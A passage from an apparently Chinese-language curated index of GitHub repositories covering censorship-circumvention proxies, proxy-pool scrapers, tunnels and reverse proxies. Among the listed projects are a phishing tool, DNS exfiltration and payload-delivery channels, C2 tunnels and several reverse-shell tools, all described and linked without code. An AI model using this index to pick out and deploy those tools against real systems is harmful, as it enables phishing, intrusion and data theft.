[**25531**ๆ˜Ÿ][14d] [Go] [v2ray/v2ray-core](https://github.com/v2ray/v2ray-core) A platform for building proxies to bypass network restrictions. - [**1636**ๆ˜Ÿ][5m] [CSS] [functionclub/v2ray.fun](https://github.com/functionclub/v2ray.fun) ๆญฃๅœจๅผ€ๅ‘็š„ๅ…จๆ–ฐ V2ray.Fun - [**1344**ๆ˜Ÿ][10m] [C#] [cenmrev/v2rayw](https://github.com/cenmrev/v2rayw) GUI for v2ray-core on Windows - [**418**ๆ˜Ÿ][21d] [Makefile] [kuoruan/openwrt-v2ray](https://github.com/kuoruan/openwrt-v2ray) V2Ray for OpenWrt - [**259**ๆ˜Ÿ][2y] [C#] [v2ray/v2rayn](https://github.com/v2ray/v2rayn) A Windows GUI client for V2Ray. - [**214**ๆ˜Ÿ][2m] [Ruby] [v2ray/homebrew-v2ray](https://github.com/v2ray/homebrew-v2ray) The homebrew tap for v2ray-core. - [**207**ๆ˜Ÿ][2y] [C#] [shinlor/v2rays](https://github.com/shinlor/v2rays) ไธ€ไธชV2Ray็š„Windowsๅฎขๆˆท็ซฏ - [**160**ๆ˜Ÿ][14d] [HTML] [v2ray/v2ray.github.io](https://github.com/v2ray/v2ray.github.io) V2Ray Portal - [**84**ๆ˜Ÿ][2m] [ObjC] [gssdromen/v2rayc](https://github.com/gssdromen/v2rayc) a GUI for v2ray on Mac #### <a id="e3e66ebfedb62affa6ef04eced00448f"></a>ๅธๅท - [**2993**ๆ˜Ÿ][3m] [Dockerfile] [thinkdevelop/free-ss-ssr](https://github.com/thinkdevelop/free-ss-ssr) SS่ดฆๅทใ€SSR่ดฆๅทใ€V2Ray่ดฆๅท #### <a id="d34c4520a378177efaaa60911f07d8d0"></a>ๆจกๆฟ #### <a id="733afa2680ce2eab471cddc5654cd95b"></a>ๅฎ‰่ฃ…&&็ฎก็† - [**8564**ๆ˜Ÿ][7m] [Shell] [233boy/v2ray](https://github.com/233boy/v2ray) ๆœ€ๅฅฝ็”จ็š„ V2Ray ไธ€้”ฎๅฎ‰่ฃ…่„šๆœฌ & ็ฎก็†่„šๆœฌ - [**2844**ๆ˜Ÿ][16d] [Py] [jrohy/multi-v2ray](https://github.com/jrohy/multi-v2ray) v2ray easy delpoy & manage tool๏ผŒ support multiple user & protocol manage - [**2160**ๆ˜Ÿ][26d] [Shell] [wulabing/v2ray_ws-tls_bash_onekey](https://github.com/wulabing/v2ray_ws-tls_bash_onekey) V2Ray Nginx+vmess+ws+tls/ http2 over tls ไธ€้”ฎๅฎ‰่ฃ…่„šๆœฌ #### <a id="1072cf1157d333483198c30028f65e5a"></a>ๅ…ถไป– ### <a id="160b0cdb52f30bdc3f222aa08c91d10d"></a>proxychains - [**5659**ๆ˜Ÿ][2m] [C] [rofl0r/proxychains-ng](https://github.com/rofl0r/proxychains-ng) proxychains ng (new generation) - a preloader which hooks calls to sockets in dynamically linked programs and redirects it through one or more socks/http proxies. continuation of the unmaintained proxychains project. the sf.net page is currently not updated, use releases from github release page instead. - [**2402**ๆ˜Ÿ][11m] [C] [haad/proxychains](https://github.com/haad/proxychains) a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy. Supported auth-types: "user/pass" for SOCKS4/5, "basic" for HTTP. - [**15**ๆ˜Ÿ][1m] [Ruby] [thesecondsun/proxadd](https://github.com/thesecondsun/proxadd) A tool that adds proxy entries to Proxychains config ### <a id="8ff91c8095e77fe88dcac1cff78d79c6"></a>ๅฎ‰่ฃ…&&้…็ฝฎ&&็ฎก็† - [**20221**ๆ˜Ÿ][5d] [Shell] [streisandeffect/streisand](https://github.com/StreisandEffect/streisand) Streisand sets up a new server running your choice of WireGuard, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, or a Tor bridge. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists. - [**3413**ๆ˜Ÿ][] [Smarty] [anankke/sspanel-uim](https://github.com/anankke/sspanel-uim) ไธ“ไธบ Shadowsocks / ShadowsocksR / V2Ray ่ฎพ่ฎก็š„ๅคš็”จๆˆท็ฎก็†้ขๆฟ - [**3248**ๆ˜Ÿ][11d] [TS] [jigsaw-code/outline-server](https://github.com/jigsaw-code/outline-server) ๅœจDigitalOceanไธŠๅˆ›ๅปบๅ’Œ็ฎก็†OutlineๆœๅŠกๅ™จ - [**824**ๆ˜Ÿ][2y] [PHP] [zhufaner/shadowsocks-manage-system](https://github.com/zhufaner/shadowsocks-manage-system) ็ง‘ๅญฆไธŠ็ฝ‘็ฎก็†็ณป็ปŸ - [**344**ๆ˜Ÿ][7d] [Shell] [loyess/shell](https://github.com/loyess/shell) Shadowsocks-libev with plugins one-click installation. For example: v2ray-plugin, kcptun, simple-obfs, goquiet, cloak... - [**85**ๆ˜Ÿ][1y] [Py] [justsoos/ss-ssr-v2ray-gadget](https://github.com/justsoos/ss-ssr-v2ray-gadget) merge, deduplicate, backup, convert and online benchmark tools set for shadowsocks/shadowsocksR, v2ray. by python3 - [**57**ๆ˜Ÿ][3m] [Shell] [hirbodbehnam/shadowsocks-cloak-installer](https://github.com/hirbodbehnam/shadowsocks-cloak-installer) A one-key script to setup Cloak plugin with Shadowsocks on your server - [**51**ๆ˜Ÿ][1m] [C] [ixzzving/ssr-vpn](https://github.com/ixzzving/ssr-vpn) Shadowsocks & ShadowsocksR & V2Ray & V2RayNG & VNET/้…ธ้…ธไนณ่Š‚็‚นๅŠๅฎขๆˆท็ซฏ - [**41**ๆ˜Ÿ][1y] [Py] [ccapton/brook-ok](https://github.com/ccapton/brook-ok) brook็จ‹ๅบๆœๅŠก็ซฏ้…็ฝฎ็จ‹ๅบ๏ผŒไธ€้”ฎๆญๅปบbrook / Shadowsocks / Socks5ๆœๅŠก็”จไบŽ็ง‘ๅญฆไธŠ็ฝ‘ - [**36**ๆ˜Ÿ][] [fqshare/free-ssr-v2ray-vpn](https://github.com/fqshare/free-ssr-v2ray-vpn) ssr/้…ธ้…ธไนณ/v2ray/shadowsocks่Š‚็‚น/vpn/ๆœบๅœบๆฌ่ฟๅˆ†ไบซ - [**32**ๆ˜Ÿ][11m] [TS] [xfoxfu/clover](https://github.com/xfoxfu/clover) Shadowsocks and v2ray User Interface ### <a id="b2241c68725526c88e69f1d71405c6b2"></a>ไปฃ็†็ˆฌๅ–&&ไปฃ็†ๆฑ  #### <a id="6d7e96fefef09f8ac350c8e9d77ec49c"></a>ๆŠ“ๅ– - [**8335**ๆ˜Ÿ][1m] [Py] [jhao104/proxy_pool](https://github.com/jhao104/proxy_pool) Python็ˆฌ่™ซไปฃ็†IPๆฑ  - [**3656**ๆ˜Ÿ][2y] [Py] [qiyeboy/ipproxypool](https://github.com/qiyeboy/ipproxypool) IPProxyPoolไปฃ็†ๆฑ ้กน็›ฎ๏ผŒๆไพ›ไปฃ็†ip - [**1545**ๆ˜Ÿ][2y] [Py] [awolfly9/ipproxytool](https://github.com/awolfly9/ipproxytool) ไฝฟ็”จ scrapy ็ˆฌ่™ซๆŠ“ๅ–ไปฃ็†็ฝ‘็ซ™๏ผŒ่Žทๅ–ๅคง้‡็š„ๅ…่ดนไปฃ็† ipใ€‚่ฟ‡ๆปคๅ‡บๆ‰€ๆœ‰ๅฏ็”จ็š„ ip๏ผŒๅญ˜ๅ…ฅๆ•ฐๆฎๅบ“ไปฅๅค‡ไฝฟ็”จ - [**853**ๆ˜Ÿ][4d] [Go] [henson/proxypool](https://github.com/henson/proxypool) Golangๅฎž็Žฐ็š„IPไปฃ็†ๆฑ  - [**562**ๆ˜Ÿ][1y] [Py] [fate0/getproxy](https://github.com/fate0/getproxy) ๆ˜ฏไธ€ไธชๆŠ“ๅ–ๅ‘ๆ”พไปฃ็†็ฝ‘็ซ™๏ผŒ่Žทๅ– http/https ไปฃ็†็š„็จ‹ๅบ - [**305**ๆ˜Ÿ][2y] [Py] [wisedoge/proxypool](https://github.com/wisedoge/proxypool) ่ทจ่ฏญ่จ€IPไปฃ็†ๆฑ ๏ผŒPythonๅฎž็Žฐใ€‚ - [**284**ๆ˜Ÿ][9m] [Py] [chenjiandongx/async-proxy-pool](https://github.com/chenjiandongx/async-proxy-pool) ๅผ‚ๆญฅ็ˆฌ่™ซไปฃ็†ๆฑ ๏ผŒไปฅ Python asyncio ไธบๅŸบ็ก€๏ผŒๆ—จๅœจๅ……ๅˆ†ๅˆฉ็”จ Python ็š„ๅผ‚ๆญฅๆ€ง่ƒฝใ€‚ - [**160**ๆ˜Ÿ][7m] [JS] [tidesec/proxy_pool](https://github.com/tidesec/proxy_pool) ไธ€ไธชๅฐๅทง็š„ไปฃ็†ipๆŠ“ๅ–+่ฏ„ไผฐ+ๅญ˜ๅ‚จ+ๅฑ•็คบ็š„ไธ€ไฝ“ๅŒ–็š„ๅทฅๅ…ท๏ผŒๅŒ…ๆ‹ฌไบ†webๅฑ•็คบๅ’ŒๆŽฅๅฃใ€‚ - [**137**ๆ˜Ÿ][4m] [Py] [derekhe/proxypool](https://github.com/derekhe/proxypool) ้ซ˜่ดจ้‡ๅ…่ดนไปฃ็†ๆฑ โ€”โ€”ๆฏๆ—ฅ1w+ไปฃ็†่ต„ๆบๆปšๅŠจๆ›ดๆ–ฐ - [**123**ๆ˜Ÿ][2y] [Py] [lujqme/proxy_pool](https://github.com/lujqme/proxy_pool) IPไปฃ็†ๆฑ  - [**116**ๆ˜Ÿ][5y] [Py] [h01/proxyscanner](https://github.com/h01/proxyscanner) python HTTPไปฃ็†ๆ‰ซๆ - [**106**ๆ˜Ÿ][4y] [Py] [mapleray/proxy_pool](https://github.com/mapleray/proxy_pool) python ไปฃ็†ๆฑ  - [**95**ๆ˜Ÿ][3m] [Py] [cwjokaka/ok_ip_proxy_pool](https://github.com/cwjokaka/ok_ip_proxy_pool) ไธ€ไธช่ฟ˜ok็š„IPไปฃ็†ๆฑ  - [**63**ๆ˜Ÿ][10m] [Py] [xnffdd/proxypool](https://github.com/xnffdd/proxypool) ่‡ชๅปบๅ…่ดนIPไปฃ็†ๆฑ ใ€‚ - [**38**ๆ˜Ÿ][1y] [Py] [leeyis/ip_proxy_pool](https://github.com/leeyis/ip_proxy_pool) ๅŠจๆ€็”Ÿๆˆ็ˆฌ่™ซ๏ผŒไฝฟ็”จscrapyไปŽไบ’่”็ฝ‘ๆŠ“ๅ–ๅนถๆฃ€ๆŸฅๅ…่ดนIP - [**38**ๆ˜Ÿ][2m] [Py] [yaleimeng/free_proxy_pool](https://github.com/yaleimeng/free_proxy_pool) ๅฏนๅ…่ดนไปฃ็†IP็ฝ‘็ซ™่ฟ›่กŒ็ˆฌๅ–๏ผŒๆ”ถ้›†ๆฑ‡ๆ€ปไธบ่‡ชๅทฑ็š„ไปฃ็†ๆฑ ใ€‚ๅ…ณ้”ฎๆ˜ฏ้ชŒ่ฏไปฃ็†็š„ๆœ‰ๆ•ˆๆ€งใ€ๅŒฟๅๆ€งใ€ๅŽป้‡ๅค #### <a id="4417ed293dcbe11e3b5057be518e670d"></a>ไฝฟ็”จ - [**963**ๆ˜Ÿ][1y] [JS] [fabienvauchelles/scrapoxy](https://github.com/fabienvauchelles/scrapoxy) Scrapoxyๅฐ†ๆ‚จ็š„็ˆฌ่™ซ้š่—ๅœจไบ‘ๅŽ้ขใ€‚ๅฏๅŠจไปฃ็†ๆฑ ๆฅๅ‘้€็ฝ‘็ปœ่ฏทๆฑ‚ - [**302**ๆ˜Ÿ][5m] [Py] [rootviii/proxy_requests](https://github.com/rootviii/proxy_requests) Python็ฑป๏ผŒไฝฟ็”จ็ˆฌๅ–็š„ไปฃ็†ๅ‘้€http GET / POST่ฏทๆฑ‚ *** ## <a id="07fb7fc7f8ef8da762c2cc86c482a3f6"></a>ๆ–‡็ซ  # <a id="e996f5ff54050629de0d9d5e68fcb630"></a>้šง้“&&็ฉฟ้€&&ๅๅ‘ไปฃ็† *** ## <a id="01e6651181d405ecdcd92a452989e7e0"></a>ๅทฅๅ…ท ### <a id="ea4dfcd8f33ec1852180c6283b2c8516"></a>ๆœชๅˆ†็ฑป - [**11294**ๆ˜Ÿ][3d] [Go] [xtaci/kcptun](https://github.com/xtaci/kcptun) A Stable & Secure Tunnel based on KCP with N:M multiplexing and FEC. Available for ARM, MIPS, 386 and AMD64 - [**2391**ๆ˜Ÿ][12d] [Java] [mock-server/mockserver](https://github.com/mock-server/mockserver) MockServer enables easy mocking of any system you integrate with via HTTP or HTTPS with clients written in Java, JavaScript and Ruby. MockServer also includes a proxy that introspects all proxied traffic including encrypted SSL traffic and supports Port Forwarding, Web Proxying (i.e. HTTP proxy), HTTPS Tunneling Proxying (using HTTP CONNECT) andโ€ฆ - [**1624**ๆ˜Ÿ][9m] [JS] [localtunnel/server](https://github.com/localtunnel/server) server for localtunnel.me - [**968**ๆ˜Ÿ][19d] [HTML] [darksecdevelopers/hiddeneye](https://github.com/darksecdevelopers/hiddeneye) Modern Phishing Tool With Advanced Functionality And Multiple Tunnelling Services [ Android-Support-Available ] - [**321**ๆ˜Ÿ][3y] [JS] [mamboleoo/infinitetubes](https://github.com/mamboleoo/infinitetubes) A tunnel experiment in WebGL inspired by the effect seen on - [**308**ๆ˜Ÿ][2y] [JS] [arno0x/dnsexfiltrator](https://github.com/arno0x/dnsexfiltrator) Data exfiltration over DNS request covert channel - [**296**ๆ˜Ÿ][4y] [samyk/proxygambit](https://github.com/samyk/proxygambit) Anonymize and fracture network traffic/Internet access over a point-to-point wireless link or through TCP->GSM->wifi tunnel (advanced resurrection of ProxyHam) - [**257**ๆ˜Ÿ][2y] [Ruby] [bcoles/ssrf_proxy](https://github.com/bcoles/ssrf_proxy) SSRF Proxy facilitates tunneling HTTP communications through servers vulnerable to Server-Side Request Forgery. - [**211**ๆ˜Ÿ][9m] [Go] [cloudflare/cloudflare-ingress-controller](https://github.com/cloudflare/cloudflare-ingress-controller) A Kubernetes ingress controller for Cloudflare's Argo Tunnels - [**174**ๆ˜Ÿ][3y] [C#] [gangzhuo/kcptun-gui-windows](https://github.com/gangzhuo/kcptun-gui-windows) ้šง้“ๅทฅๅ…ทkcptun็š„GUI - [**121**ๆ˜Ÿ][3y] [PS] [arno0x/dnsdelivery](https://github.com/arno0x/dnsdelivery) DNSDelivery provides delivery and in memory execution of shellcode or .Net assembly using DNS requests delivery channel. - [**98**ๆ˜Ÿ][1m] [Go] [ls0f/cracker](https://github.com/ls0f/cracker) tunnel over http[s] - [**90**ๆ˜Ÿ][2m] [JS] [beameio/beame-sdk](https://github.com/beameio/beame-sdk) HTTPS Server without a public/static IP. TLS Tunnels with decentralized credentials. - [**57**ๆ˜Ÿ][4m] [Go] [flynaj/kcptun](https://github.com/flynaj/kcptun) A Secure Tunnel Based On KCP with N:M Multiplexing - [**41**ๆ˜Ÿ][2y] [JS] [arno0x/reflectivednsexfiltrator](https://github.com/arno0x/reflectivednsexfiltrator) Data exfiltration using reflective DNS resolution covert channel - [**38**ๆ˜Ÿ][2y] [Visual Basic .NET] [arno0x/webdavdelivery](https://github.com/arno0x/webdavdelivery) A WebDAV PROPFIND covert channel to deliver payloads - [**25**ๆ˜Ÿ][8y] [C] [50m30n3/dsptunnel](https://github.com/50m30n3/dsptunnel) IP over audio tunnel - [**25**ๆ˜Ÿ][2y] [Py] [dsnezhkov/octohook](https://github.com/dsnezhkov/octohook) Git Web Hook Tunnel for C2 - [**19**ๆ˜Ÿ][13d] [Java] [cronn-de/ssh-proxy](https://github.com/cronn-de/ssh-proxy) Pure Java implementation for SSH port tunneling that understands ProxyJump and ProxyCommand - [**17**ๆ˜Ÿ][10m] [Go] [bitnami-labs/udig](https://github.com/bitnami-labs/udig) public-key addressed TCP tunnel broker - [**17**ๆ˜Ÿ][1m] [Go] [rocket049/powerchat](https://github.com/rocket049/powerchat) linux / windows ๅŠ ๅฏ†่Šๅคฉ๏ผŒๅˆ†ไบซๆ–‡ไปถ๏ผŒๅˆ†ไบซๅ†…ๅฎน๏ผˆmarkdownๆˆ–html๏ผ‰๏ผŒTCPๅŠ ๅฏ†้šง้“ - [**15**ๆ˜Ÿ][2y] [Go] [liljebergxyz/tnnlink](https://github.com/liljebergxyz/tnnlink) Simple HTTP tunnel using SSH remote port forwarding - [**14**ๆ˜Ÿ][1y] [Go] [bleenco/vex](https://github.com/bleenco/vex) reverse HTTP proxy tunnel via secure SSH connections. - [**14**ๆ˜Ÿ][5d] [Assembly] [sopium/titun](https://github.com/sopium/titun) Simple, fast, and cross-platform IP tunnel written in Rust. WireGuard compatible. - [**13**ๆ˜Ÿ][3y] [Ruby] [lnussbaum/tuns](https://github.com/lnussbaum/tuns) IP over DNS tunnel - [**13**ๆ˜Ÿ][1y] [Go] [llkat/rsockstun](https://github.com/llkat/rsockstun) reverse socks tunneler with ntlm and proxy support - [**12**ๆ˜Ÿ][2y] [C] [massar/sixxsd](https://github.com/massar/sixxsd) sixxsd - The SixXS Daemon - IPv6 Tunnel & Routing Engine - [**12**ๆ˜Ÿ][3m] [Go] [movsb/taosocks](https://github.com/movsb/taosocks) A smart tunnel proxy that helps you bypass firewalls. - [**11**ๆ˜Ÿ][30d] [Go] [potato-industries/gohide](https://github.com/potato-industries/gohide) tunnel port to port traffic over an obfuscated channel with AES-GCM encryption. - [**8**ๆ˜Ÿ][1y] [Shell] [raffaelespazzoli/openshift-sdn-encrypted-tunnel](https://github.com/raffaelespazzoli/openshift-sdn-encrypted-tunnel) - [**6**ๆ˜Ÿ][3y] [Py] [lockout/tun64](https://github.com/lockout/tun64) IPv6 transition tunnel-based mechanism information exfiltration tool - [**6**ๆ˜Ÿ][4y] [Py] [shadejinx/tunviz](https://github.com/shadejinx/tunviz) DNS Tunnel Detection - [**6**ๆ˜Ÿ][4y] [Lua] [takeshixx/ip-https-tools](https://github.com/takeshixx/ip-https-tools) Tools for the IP over HTTPS (IP-HTTPS) Tunneling Protocol - [**2**ๆ˜Ÿ][1y] [Py] [ciscose/ngrok-spark-startup-helper](https://github.com/ciscose/ngrok-spark-startup-helper) Helps with ngrok tunnel management when developing Cisco WebEx Teams Bots - [**1**ๆ˜Ÿ][2y] [Py] [0x00-0x00/proxypwn](https://github.com/0x00-0x00/proxypwn) ProxyPwn is a scanner and tunneler for open proxies. - [**1**ๆ˜Ÿ][4m] [Ruby] [simp/pupmod-simp-stunnel](https://github.com/simp/pupmod-simp-stunnel) The SIMP stunnel Puppet Module ### <a id="e9f97504fbd14c8bb4154bd0680e9e62"></a>ๅๅ‘ไปฃ็† - [**17711**ๆ˜Ÿ][4y] [Go] [inconshreveable/ngrok](https://github.com/inconshreveable/ngrok) ๅๅ‘ไปฃ็†๏ผŒๅœจๅ…ฌ็ฝ‘็ปˆ็ซฏๅ’ŒๆœฌๅœฐๆœๅŠกไน‹้—ดๅˆ›ๅปบๅฎ‰ๅ…จ็š„้šง้“ - [**9561**ๆ˜Ÿ][5d] [Go] [cnlh/nps](https://github.com/cnlh/nps) ไธ€ๆฌพ่ฝป้‡็บงใ€ๅŠŸ่ƒฝๅผบๅคง็š„ๅ†…็ฝ‘็ฉฟ้€ไปฃ็†ๆœๅŠกๅ™จใ€‚ๆ”ฏๆŒtcpใ€udpๆต้‡่ฝฌๅ‘๏ผŒๆ”ฏๆŒๅ†…็ฝ‘httpไปฃ็†ใ€ๅ†…็ฝ‘socks5ไปฃ็†๏ผŒๅŒๆ—ถๆ”ฏๆŒsnappyๅŽ‹็ผฉใ€็ซ™็‚นไฟๆŠคใ€ๅŠ ๅฏ†ไผ ่พ“ใ€ๅคš่ทฏๅค็”จใ€headerไฟฎๆ”น็ญ‰ใ€‚ๆ”ฏๆŒwebๅ›พๅฝขๅŒ–็ฎก็†๏ผŒ้›†ๆˆๅคš็”จๆˆทๆจกๅผใ€‚ - [**4896**ๆ˜Ÿ][11m] [Go] [bitly/oauth2_proxy](https://github.com/bitly/oauth2_proxy) ๅๅ‘ไปฃ็†๏ผŒ้™ๆ€ๆ–‡ไปถๆœๅŠกๅ™จ๏ผŒๆไพ›Providers(Google/Github)่ฎค่ฏ - [**3647**ๆ˜Ÿ][2m] [Java] [ffay/lanproxy](https://github.com/ffay/lanproxy) ๅฐ†ๅฑ€ๅŸŸ็ฝ‘ไธชไบบ็”ต่„‘ใ€ๆœๅŠกๅ™จไปฃ็†ๅˆฐๅ…ฌ็ฝ‘็š„ๅ†…็ฝ‘็ฉฟ้€ๅทฅๅ…ท๏ผŒๆ”ฏๆŒtcpๆต้‡่ฝฌๅ‘๏ผŒๅฏๆ”ฏๆŒไปปไฝ•tcpไธŠๅฑ‚ๅ่ฎฎ๏ผˆ่ฎฟ้—ฎๅ†…็ฝ‘็ฝ‘็ซ™ใ€ๆœฌๅœฐๆ”ฏไป˜ๆŽฅๅฃ่ฐƒ่ฏ•ใ€ssh่ฎฟ้—ฎใ€่ฟœ็จ‹ๆกŒ้ข...๏ผ‰ - [**2599**ๆ˜Ÿ][11d] [C++] [fanout/pushpin](https://github.com/fanout/pushpin) ไฝฟ็”จC ++็ผ–ๅ†™็š„ๅๅ‘ไปฃ็†ๆœๅŠกๅ™จ๏ผŒๅฏไปฅ่ฝปๆพๅฎž็ŽฐWebSocket๏ผŒHTTPๆตๅ’ŒHTTP้•ฟ่ฝฎ่ฏขๆœๅŠก - [**2562**ๆ˜Ÿ][1m] [Go] [drk1wi/modlishka](https://github.com/drk1wi/modlishka) ไธ€ไธชๅผบๅคง่€Œ็ตๆดป็š„HTTPๅๅ‘ไปฃ็† - [**1894**ๆ˜Ÿ][1y] [Py] [aploium/zmirror](https://github.com/aploium/zmirror) ไธ€ไธชPythonๅๅ‘HTTPไปฃ็†็จ‹ๅบ, ็”จไบŽๅฟซ้€Ÿใ€็ฎ€ๅ•ๅœฐๅˆ›ๅปบๅˆซ็š„็ฝ‘็ซ™็š„้•œๅƒ, ่‡ชๅธฆๆœฌๅœฐๆ–‡ไปถ็ผ“ๅญ˜ใ€CDNๆ”ฏๆŒ - [**1190**ๆ˜Ÿ][5d] [Go] [pusher/oauth2_proxy](https://github.com/pusher/oauth2_proxy) ๆไพ›ไธŽGoogle๏ผŒGithubๆˆ–ๅ…ถไป–ๆไพ›ๅ•†่ฟ›่กŒ่บซไปฝ้ชŒ่ฏ็š„ๅๅ‘ไปฃ็†ใ€‚ - [**986**ๆ˜Ÿ][1m] [JS] [lukechilds/reverse-shell](https://github.com/lukechilds/reverse-shell) ๅฎนๆ˜“่ฎฐๅฟ†็š„ๅๅ‘shell๏ผŒๅฏๅœจๅคงๅคšๆ•ฐ็ฑปUnix็ณป็ปŸไธŠไฝฟ็”จ - [**821**ๆ˜Ÿ][7y] [C] [inquisb/icmpsh](https://github.com/inquisb/icmpsh) ไธ€ไธช็ฎ€ๅ•็š„ๅๅ‘ICMP Shell๏ผŒๅ…ผๅฎนWin32 slaveๅ’ŒPOSIX๏ผŒCใ€Perlใ€Python - [**783**ๆ˜Ÿ][t] [C#] [damianh/proxykit](https://github.com/damianh/proxykit) ๅˆ›ๅปบไปฅไปฃ็ ไผ˜ๅ…ˆ็š„HTTPๅๅ‘ไปฃ็†๏ผŒไฝœไธบไธญ้—ดไปถๆ‰˜็ฎกๅœจASP.NET Coreไธญ - [**665**ๆ˜Ÿ][5m] [Py] [aploium/shootback](https://github.com/aploium/shootback) ๅๅ‘TCP้šง้“๏ผŒ่ฎฟ้—ฎNATๆˆ–้˜ฒ็ซๅข™ๅŽ้ข็š„็›ฎๆ ‡ - [**471**ๆ˜Ÿ][1m] [JS] [siujoeng-lau/workers-proxy](https://github.com/siujoeng-lau/workers-proxy) ไธ€ไธช่ฝป้‡็บง็š„Javascriptๅบ”็”จ็จ‹ๅบ๏ผŒไปŽๅ…ถไป–ๆœๅŠกๅ™จๆฃ€็ดข่ต„ๆบ - [**388**ๆ˜Ÿ][2y] [Py] [mricon/rev-proxy-grapher](https://github.com/mricon/rev-proxy-grapher) ็”Ÿๆˆๅๅ‘ไปฃ็†ๆต็จ‹graphvizๅ›พ - [**388**ๆ˜Ÿ][1y] [Go] [mwitkow/grpc-proxy](https://github.com/mwitkow/grpc-proxy) ไธ€ไธชGoๅๅ‘ไปฃ็†๏ผŒไปฅๆœ€ๅฐ็š„ๅผ€้”€ๅฏนgRPC่ฐƒ็”จ๏ผŒๆ”ฏๆŒไธฐๅฏŒ่ทฏ็”ฑ - [**365**ๆ˜Ÿ][4y] [Py] [ahhh/reverse_dns_shell](https://github.com/ahhh/reverse_dns_shell) ไฝฟ็”จDNSไฝœไธบc2้€š้“็š„pythonๅๅ‘shell - [**346**ๆ˜Ÿ][3y] [Py] [nccgroup/abptts](https://github.com/nccgroup/abptts) ไฝฟ็”จPythonๅฎขๆˆท็ซฏ่„šๆœฌๅ’ŒWebๅบ”็”จ็จ‹ๅบๆœๅŠกๅ™จ้กต้ข/็จ‹ๅบๅŒ…๏ผŒ้€š่ฟ‡HTTP / HTTPS่ฟžๆŽฅ๏ผŒๅฐ†TCP้€šไฟก้€š่ฟ‡้šง้“๏ผŒไผ ่พ“ๅˆฐWebๅบ”็”จ็จ‹ๅบๆœๅŠกๅ™จ - [**331**ๆ˜Ÿ][5m] [Go] [sysdream/hershell](https://github.com/sysdream/hershell) Go ่ฏญ่จ€็ผ–ๅ†™็š„ๅๅ‘ Shell - [**287**ๆ˜Ÿ][1y] [Py] [klsecservices/rpivot](https://github.com/klsecservices/rpivot) ้€š่ฟ‡Socks4ๅฐ†็ฝ‘็ปœๆต้‡้šง้“ๅˆฐๅ†…้ƒจ็ฝ‘็ปœ - [**285**ๆ˜Ÿ][3y] [Go] [longxboy/lunnel](https://github.com/longxboy/lunnel) ็ฎ€ๅ•ๆ˜“็”จ็š„ๅ†…็ฝ‘NAT็ฉฟ่ถŠใ€ๅๅ‘ไปฃ็†่ฝฏไปถ - [**255**ๆ˜Ÿ][5m] [Go] [lesnuages/hershell](https://github.com/lesnuages/hershell) ็”จGo็ผ–ๅ†™็š„็ฎ€ๅ•TCPๅๅ‘Shell - [**251**ๆ˜Ÿ][5m] [Shell] [thesecondsun/revssl](https://github.com/thesecondsun/revssl) ่‡ชๅŠจ็”ŸๆˆOpenSSLๅๅ‘shell็š„็ฎ€ๅ•่„šๆœฌ - [**224**ๆ˜Ÿ][1y] [Go] [koding/websocketproxy](https://github.com/koding/websocketproxy) WebSocket reverse proxy handler for Go - [**189**ๆ˜Ÿ][3y] [Nginx] [awslabs/ecs-nginx-reverse-proxy](https://github.com/awslabs/ecs-nginx-reverse-proxy) Reference architecture for deploying Nginx on ECS, both as a basic static resource server, and as a reverse proxy in front of a dynamic application server. - [**175**ๆ˜Ÿ][2m] [Shell] [duy13/vddos-protection](https://github.com/duy13/vddos-protection) Welcome to vDDoS, a HTTP(S) DDoS Protection Reverse Proxy. Thank you for using! - [**157**ๆ˜Ÿ][3y] [Ruby] [waterlink/rack-reverse-proxy](https://github.com/waterlink/rack-reverse-proxy) A Reverse Proxy for Rack - [**146**ๆ˜Ÿ][2m] [Py] [chrispetrou/hrshell](https://github.com/chrispetrou/hrshell) HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities. - [**143**ๆ˜Ÿ][1y] [Shell] [adi90x/rancher-active-proxy](https://github.com/adi90x/rancher-active-proxy) All in one active reverse proxy for Rancher ! - [**136**ๆ˜Ÿ][24d] [PS] [antoniococo/conptyshell](https://github.com/antoniococo/conptyshell) ConPtyShell - Fully Interactive Reverse Shell for Windows - [**128**ๆ˜Ÿ][3m] [grrrdog/weird_proxies](https://github.com/grrrdog/weird_proxies) Reverse proxies cheatsheet - [**124**ๆ˜Ÿ][4m] [Go] [stalkr/dns-reverse-proxy](https://github.com/stalkr/dns-reverse-proxy) DNS Reverse Proxy - [**118**ๆ˜Ÿ][3y] [PHP] [dhayalanb/windows-php-reverse-shell](https://github.com/dhayalanb/windows-php-reverse-shell) Simple php reverse shell implemented using binary . - [**113**ๆ˜Ÿ][17d] [Java] [mkopylec/charon-spring-boot-starter](https://github.com/mkopylec/charon-spring-boot-starter) Reverse proxy implementation in form of a Spring Boot starter. - [**107**ๆ˜Ÿ][3d] [Go] [jetstack/kube-oidc-proxy](https://github.com/jetstack/kube-oidc-proxy) Reverse proxy to authenticate to managed Kubernetes API servers via OIDC. - [**105**ๆ˜Ÿ][4y] [Shell] [cornerpirate/socat-shell](https://github.com/cornerpirate/socat-shell) Socat can be used to establish a reverse shell with bash tab completion and full shell functionality - [**104**ๆ˜Ÿ][2y] [Ruby] [axsuul/rails-reverse-proxy](https://github.com/axsuul/rails-reverse-proxy) A reverse proxy for Ruby on Rails - [**100**ๆ˜Ÿ][1y] [Go] [bechurch/reverse-proxy-demo](https://github.com/bechurch/reverse-proxy-demo) - [**83**ๆ˜Ÿ][2y] [Go] [asciimoo/filtron](https://github.com/asciimoo/filtron) ๅๅ‘HTTPไปฃ็  - [**73**ๆ˜Ÿ][7m] [Go] [audibleblink/letsproxy](https://github.com/audibleblink/letsproxy) Quickly fetch Let's Encrypt certs and serve a reverse proxy - [**60**ๆ˜Ÿ][4y] [Py] [dotcppfile/serbot](https://github.com/dotcppfile/serbot) Advanced Controller/Server/Client Reverse Shell/Bot โ€“ Windows/Linux โ€“ Python - [**53**ๆ˜Ÿ][3y] [Shell] [mempodippy/snodew](https://github.com/mempodippy/snodew) PHP root (suid) reverse shell - [**49**ๆ˜Ÿ][14d] [Elixir] [tallarium/reverse_proxy_plug](https://github.com/tallarium/reverse_proxy_plug) - [**45**ๆ˜Ÿ][8m] [Dockerfile] [jmg87/redteam-k8spwn](https://github.com/jmg87/redteam-k8spwn) Reverse shell container for k8s deployments - [**44**ๆ˜Ÿ][12m] [C#] 